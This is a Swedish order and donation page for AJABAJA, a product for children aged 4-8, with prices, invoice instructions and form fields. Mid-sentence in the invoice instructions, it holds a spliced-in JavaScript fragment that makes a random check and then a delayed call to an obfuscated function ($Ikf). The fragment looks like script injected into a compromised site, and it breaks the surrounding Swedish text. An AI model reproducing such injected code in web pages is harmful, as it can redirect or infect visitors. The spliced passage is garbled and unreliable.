Tack för ditt intresse!

 

Vårt mål är att AJABAJA görs tillgängligt för alla de ca 50000 enheter/avdelningar/klasser i Sverige som har barn i åldern 4-8 år.

 

För att vi skall lyckas med detta söker vi en finansiell partner som liksom vi brinner för att göra skillnad för vår framtid – barnen. Vår övertygelse är att vi gör störst skillnad om vi kan undvika att Ajabaja för dig som pedagog blir ett beslut om kronor och ören. Vi har stor respekt för att ekonomin är begränsad i skolans, förskolans och fritidshemmens värld. Vårt fokus just nu är att ha kontakt med kommuner, de som skall använda Ajabaja, samt söka en partner att samarbeta med.

 

Du som förälder, förskola, skola eller annan verksamhet kan självfallet köpa AJABAJA. AJABAJA kostar 375 kr styck inkl moms och frakt.

Vi ber er att vara noga med att fylla i hur många AJABAJA du önskar, fullständiga kontaktuppgifter inkl leverans adress (och faktura adress). Du beställer via formuläret nedan. Du får leveransen inom några dagar och vi bifogar en faktura i paketet. Om fakturan skall gå till en annan adress så behöver du skriva det i meddelandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande-fältet nedan tillsammans med eventuellt nödvändigt kostnadsställe som behöver finnas med i fakturatexten.

Vill du så får du som privatperson eller kommun/företag gärna betala och donera, använd då vårt Swishnummer: 123 159 1718 (Prata På Riktigt). Var noga att märka din donation eller betalning på Swish så att vi kan sätta ihop dessa korrekt.

Ditt namn (obligatorisk)

Titel/Jobbroll

Skola/Företag (obligatorisk)

Kommun (obligatorisk)

Leveransadress inkl postnummer och ort (obligatorisk)

Ditt mobilnummer (obligatorisk)

Din epost (obligatorisk)

Antal AJABAJA (obligatorisk)

Ditt meddelande